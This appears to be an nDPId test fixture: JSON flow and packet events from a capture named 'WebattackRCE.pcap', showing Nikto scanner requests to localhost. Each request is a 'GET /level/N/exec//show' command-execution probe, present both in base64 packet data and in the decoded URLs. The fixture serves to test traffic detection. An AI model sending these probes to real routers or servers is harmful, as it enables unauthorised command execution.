+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277583,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/18\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001265)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277584,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":1,"flow_last_seen":1576420277584,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277584,"pkt":"AAAAAAAAAAAAAAAACABFAADIKRRAAEAGExp\/AAABfwAAAcYIH5CpMBHnxNoUUoAYAED+vAAAAQEICp1m\/nidZv54R0VUIC9sZXZlbC8xOS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjYpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277584,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/19\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001266)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277586,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":1,"flow_last_seen":1576420277586,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277586,"pkt":"AAAAAAAAAAAAAAAACABFAADIukpAAEAGgeN\/AAABfwAAAcYKH5AiT4K97CCbIYAYAED+vAAAAQEICp1m\/nqdZv56R0VUIC9sZXZlbC8yMC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjY3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277586,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/20\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001267)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277588,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":1,"flow_last_seen":1576420277588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277588,"pkt":"AAAAAAAAAAAAAAAACABFAADIUb5AAEAG6m9\/AAABfwAAAcYMH5BdL2lKom\/agYAYAED+vAAAAQEICp1m\/nydZv58R0VUIC9sZXZlbC8yMS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277588,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/21\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001268)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277590,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":1,"flow_last_seen":1576420277590,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277590,"pkt":"AAAAAAAAAAAAAAAACABFAADIMkhAAEAGCeZ\/AAABfwAAAcYOH5Ck4gq0tTkM3YAYAED+vAAAAQEICp1m\/n6dZv5+R0VUIC9sZXZlbC8yMi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjkpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277590,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/22\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001269)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277592,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":1,"flow_last_seen":1576420277592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277592,"pkt":"AAAAAAAAAAAAAAAACABFAADIGgdAAEAGIid\/AAABfwAAAcYQH5AVMSL0hIVMXoAYAED+vAAAAQEICp1m\/oCdZv5\/R0VUIC9sZXZlbC8yMy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjcwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277592,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/23\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001270)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277593,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":1,"flow_last_seen":1576420277593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277593,"pkt":"AAAAAAAAAAAAAAAACABFAADI3vBAAEAGXT1\/AAABfwAAAcYSH5AD6eYZLZCITIAYAED+vAAAAQEICp1m\/oGdZv6BR0VUIC9sZXZlbC8yNC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277593,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/24\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001271)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277595,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":1,"flow_last_seen":1576420277595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277595,"pkt":"AAAAAAAAAAAAAAAACABFAADIjYJAAEAGrqt\/AAABfwAAAcYUH5BJPLV3Xqa0Y4AYAED+vAAAAQEICp1m\/oOdZv6DR0VUIC9sZXZlbC8yNS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277595,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/25\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001272)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277597,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":1,"flow_last_seen":1576420277597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277597,"pkt":"AAAAAAAAAAAAAAAACABFAADI4QFAAEAGWyx\/AAABfwAAAcYWH5APltgJOmv38YAYAED+vAAAAQEICp1m\/oSdZv6ER0VUIC9sZXZlbC8yNi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjczKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277597,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/26\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001273)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277598,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":1,"flow_last_seen":1576420277598,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277598,"pkt":"AAAAAAAAAAAAAAAACABFAADIuK1AAEAGg4B\/AAABfwAAAcYYH5AkxYBd7ezrAoAYAED+vAAAAQEICp1m\/oadZv6GR0VUIC9sZXZlbC8yNy9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzQpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277598,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/27\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001274)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277600,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":1,"flow_last_seen":1576420277600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277600,"pkt":"AAAAAAAAAAAAAAAACABFAADIQiNAAEAG+gp\/AAABfwAAAcYaH5DTCnrawy0BcYAYAED+vAAAAQEICp1m\/oidZv6IR0VUIC9sZXZlbC8yOC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277600,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/28\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001275)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277602,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 